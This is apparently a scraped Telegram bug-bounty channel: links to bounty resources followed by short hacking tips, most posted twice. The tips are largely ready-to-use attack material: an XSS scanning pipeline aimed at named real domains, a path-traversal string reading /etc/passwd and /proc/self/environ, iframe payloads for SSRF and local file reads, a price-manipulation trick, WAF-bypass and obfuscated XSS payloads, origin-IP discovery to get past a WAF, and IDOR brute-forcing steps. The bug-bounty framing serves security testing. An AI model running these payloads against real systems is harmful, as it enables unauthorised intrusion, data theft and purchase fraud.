Public Bug Bounty Programs [Domain,Subdomain]
https://github.com/trickest/inventory
Public Bug Bounty Platforms Around The World
https://platforms.disclose.io/
Public Bug Bounty/ Penetration Testing Reports
https://github.com/reddelexc/hackerone-reports
https://github.com/juliocesarfort/public-pentesting-reports
Bug Bounty Books
https://github.com/akr3ch/BugBountyBooks
https://github.com/AnLoMinus/Bug-Bounty
Bug Bounty Youtube Channel
https://www.youtube.com/@BugBountyReportsExplained
https://www.youtube.com/@NahamSec
https://www.youtube.com/@STOKfredrik
https://www.youtube.com/channel/UCyBZ1F8ZCJVKSIJPrLINFyA
https://www.youtube.com/@InsiderPhD
Bug Bounty Hunter Twitter/Blog/etc
https://twitter.com/thedawgyg?lang=en
https://twitter.com/d00xing?lang=en
https://m0chan.github.io/
https://twitter.com/codecancare
http://ele7enxxh.com/
https://twitter.com/ele7enxxh?lang=en
https://twitter.com/orange_8361?lang=en
https://twitter.com/_godiego__?lang=en
https://github.com/trickest/inventory
Public Bug Bounty Platforms Around The World
https://platforms.disclose.io/
Public Bug Bounty/ Penetration Testing Reports
https://github.com/reddelexc/hackerone-reports
https://github.com/juliocesarfort/public-pentesting-reports
Bug Bounty Books
https://github.com/akr3ch/BugBountyBooks
https://github.com/AnLoMinus/Bug-Bounty
Bug Bounty Youtube Channel
https://www.youtube.com/@BugBountyReportsExplained
https://www.youtube.com/@NahamSec
https://www.youtube.com/@STOKfredrik
https://www.youtube.com/channel/UCyBZ1F8ZCJVKSIJPrLINFyA
https://www.youtube.com/@InsiderPhD
Bug Bounty Hunter Twitter/Blog/etc
https://twitter.com/thedawgyg?lang=en
https://twitter.com/d00xing?lang=en
https://m0chan.github.io/
https://twitter.com/codecancare
http://ele7enxxh.com/
https://twitter.com/ele7enxxh?lang=en
https://twitter.com/orange_8361?lang=en
https://twitter.com/_godiego__?lang=en
GitHub
GitHub - trickest/inventory: Asset inventory of over 800 public bug bounty programs.
Asset inventory of over 800 public bug bounty programs. - trickest/inventory
❤4🔥4👍1
Find xss with this automation of the following work
1 subfinder -d indeed.com -o indeed.txt //Find Subdomains
2 httpx -l subdomains.txt -o httpx.txt // Live Subdomains
3 echo "indeed.com" | gau --threads 5 >> Enpoints.txt // Find Endpoints
4 cat httpx.txt | katana -jc >> Enpoints.txt // Find More Endpoints
5 cat Enpoints.txt | uro >> Endpoints_F.txt // Remove Duplicates
6 cat Endpoints_F.txt | gf xss >> XSS.txt // Filter Endpoints for XSS
7 cat XSS.txt | Gxss -p khXSS -o XSS_Ref.txt // Find reflected Parameters
8 dalfox file XSS_Ref.txt -o Vulnerable_XSS.txt // Find XSS
Script https://github.com/dirtycoder0124/xss
1 subfinder -d indeed.com -o indeed.txt //Find Subdomains
2 httpx -l subdomains.txt -o httpx.txt // Live Subdomains
3 echo "indeed.com" | gau --threads 5 >> Enpoints.txt // Find Endpoints
4 cat httpx.txt | katana -jc >> Enpoints.txt // Find More Endpoints
5 cat Enpoints.txt | uro >> Endpoints_F.txt // Remove Duplicates
6 cat Endpoints_F.txt | gf xss >> XSS.txt // Filter Endpoints for XSS
7 cat XSS.txt | Gxss -p khXSS -o XSS_Ref.txt // Find reflected Parameters
8 dalfox file XSS_Ref.txt -o Vulnerable_XSS.txt // Find XSS
Script https://github.com/dirtycoder0124/xss
GitHub
GitHub - dirtycoder0124/XSS-Automation
Contribute to dirtycoder0124/XSS-Automation development by creating an account on GitHub.
👍12🫡3💘1
1- on visiting url http://domain.tld it were redirecting first to http://domain.tod/dir1/dir2 then to sso login
2- Fuzzed after first redirection
3- http://domain.tld/dir1/dir2/FUZZ
4- this payload leads to 200 ok & disclosed all local files
////////////////../../../../../../../../etc/passwd
5- tried other local files
/etc/hosts
/etc/shells
/proc/self/environ
/bin/sh
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13
Bug Bounty Tips: Discovering the Origin IP by scanning your target IP range
When you're hunting on a bug bounty target and WAF stands in your way, here's a powerful technique to uncover the Origin IP by scanning the target's IP range.
We'll be using a simple yet effective tool called hakoriginfinder by hakluke! Get it at https://github.com/hakluke/hakoriginfinder
Here's my methodology to find the Origin IP using this tool and technique:
Discover your target's ASN and check https://bgp.he.net/AS33848#_prefixes?
Make a note of the target's IP range.
Assuming you have a WAF-protected domain called example[.]com. Use this command with the IP range Identified in step 1 and pass your target host against the -h parameter:
prips 93.184.216.0/24 | hakoriginfinder -h example[.]com
If you receive a "MATCH" output, there's a strong likelihood that you've successfully identified the Origin IP. Now, you can send requests with the same Host header to bypass WAF or for whatever your mission requires. Happy hunting!
credit:- Jayesh
When you're hunting on a bug bounty target and WAF stands in your way, here's a powerful technique to uncover the Origin IP by scanning the target's IP range.
We'll be using a simple yet effective tool called hakoriginfinder by hakluke! Get it at https://github.com/hakluke/hakoriginfinder
Here's my methodology to find the Origin IP using this tool and technique:
Discover your target's ASN and check https://bgp.he.net/AS33848#_prefixes?
Make a note of the target's IP range.
Assuming you have a WAF-protected domain called example[.]com. Use this command with the IP range Identified in step 1 and pass your target host against the -h parameter:
prips 93.184.216.0/24 | hakoriginfinder -h example[.]com
If you receive a "MATCH" output, there's a strong likelihood that you've successfully identified the Origin IP. Now, you can send requests with the same Host header to bypass WAF or for whatever your mission requires. Happy hunting!
credit:- Jayesh
GitHub
GitHub - hakluke/hakoriginfinder: Tool for discovering the origin host behind a reverse proxy. Useful for bypassing cloud WAFs!
Tool for discovering the origin host behind a reverse proxy. Useful for bypassing cloud WAFs! - hakluke/hakoriginfinder
❤9👍3👏1
Use these tools to bypass 403 most time it give false postive always check for content length.Both tool bypass protocol based,header based,path based and more techniques.
https://github.com/Dheerajmadhukar/4-ZERO-3
https://github.com/yunemse48/403bypasser
https://github.com/Dheerajmadhukar/4-ZERO-3
https://github.com/yunemse48/403bypasser
GitHub
GitHub - Dheerajmadhukar/4-ZERO-3: 403/401 Bypass Methods + Bash Automation + Your Support ;)
403/401 Bypass Methods + Bash Automation + Your Support ;) - Dheerajmadhukar/4-ZERO-3
❤7
⭐𝐗𝐒𝐒 𝐭𝐨 𝐒𝐒𝐑𝐅 (𝐌𝐞𝐭𝐡𝐨𝐝 𝟐)⭐
* Note this only works if proper sanitization is not performed and the server processes the payload server-side *
Input the following code in the vulnerable field:
<iframe src="http://localhost/some/directory"></iframe>
You can also read local files:
<iframe src="file:///C:/Windows/win.ini" width="500" height="500">
This is especially critical if an application is running on an EC2 instance that does not have IMDSv2 required.
* Note this only works if proper sanitization is not performed and the server processes the payload server-side *
Input the following code in the vulnerable field:
<iframe src="http://localhost/some/directory"></iframe>
You can also read local files:
<iframe src="file:///C:/Windows/win.ini" width="500" height="500">
This is especially critical if an application is running on an EC2 instance that does not have IMDSv2 required.
🔥10👍2👏1
Price Manipulation Method
If the product price parameter cannot be changed, change the quantity of products.
items[1][quantity]=1 --> 234 €
items[1][quantity]=0.1 --> 23.4 €
If the product price parameter cannot be changed, change the quantity of products.
items[1][quantity]=1 --> 234 €
items[1][quantity]=0.1 --> 23.4 €
🔥10👍2
A payload that bypasses Cloudflare WAF
<img/src=x onError="`${x}`;alert(`Hello`);">
<img/src=x onError="`${x}`;alert(`Hello`);">
❤25👍1
This media is not supported in your browser
VIEW IN TELEGRAM
You can now passively enumerate all endpoints of a website with katana. (No need waybackurls)
Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints
You can then check the status of these endpoints or filter in order to find new vulnerabilities:
Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints
Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints
You can then check the status of these endpoints or filter in order to find new vulnerabilities:
Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints
👍11🔥6
When hunting for IDORs during a bug bounty program, consider the following tip:
1. Leverage archive tools: Utilize tools like Wayback Machine or specialized software like Waymore to manually archive and analyze subdomains. This can help uncover hidden or previously accessible endpoints that may now be vulnerable to IDORs.
Example usage:
2. Extract all paths with specific keywords: After identifying potential paths, extract all URLs containing specific keywords, such as "admin" or "manager," to narrow down your search.
Example command:
3. Fuzzing: If you find a suspicious path but it doesn't yield any results, try fuzzing the URL with a wordlist. This can help uncover hidden or unintended parameters.
Example usage:
4. Brute force: If you find a path with a dynamic ID, consider brute-forcing the last digits or numbers. This can help uncover additional sensitive information or functionality.
Example scenario:
By following these steps, you can uncover hidden or unintended IDORs, leading to potential security vulnerabilities and rewards in bug bounty programs.
1. Leverage archive tools: Utilize tools like Wayback Machine or specialized software like Waymore to manually archive and analyze subdomains. This can help uncover hidden or previously accessible endpoints that may now be vulnerable to IDORs.
Example usage:
python3 waymore.py -i sub.target.com -mode U -xcc
2. Extract all paths with specific keywords: After identifying potential paths, extract all URLs containing specific keywords, such as "admin" or "manager," to narrow down your search.
Example command:
cat result.txt | grep "admin"
3. Fuzzing: If you find a suspicious path but it doesn't yield any results, try fuzzing the URL with a wordlist. This can help uncover hidden or unintended parameters.
Example usage:
ffuf -u https://sub.taget.com/promo/offer/1234/FUZZ -mc 200
4. Brute force: If you find a path with a dynamic ID, consider brute-forcing the last digits or numbers. This can help uncover additional sensitive information or functionality.
Example scenario:
Found path: https://sub.taget.com/promo/offer/1234/detailsBrute-force the last 3 digits: 1234
By following these steps, you can uncover hidden or unintended IDORs, leading to potential security vulnerabilities and rewards in bug bounty programs.
🔥14❤3👍3😁1
XSS Tip: If alert() is being converted to ALERT() and you can use Like
onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"
onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"
👍21🔥3❤2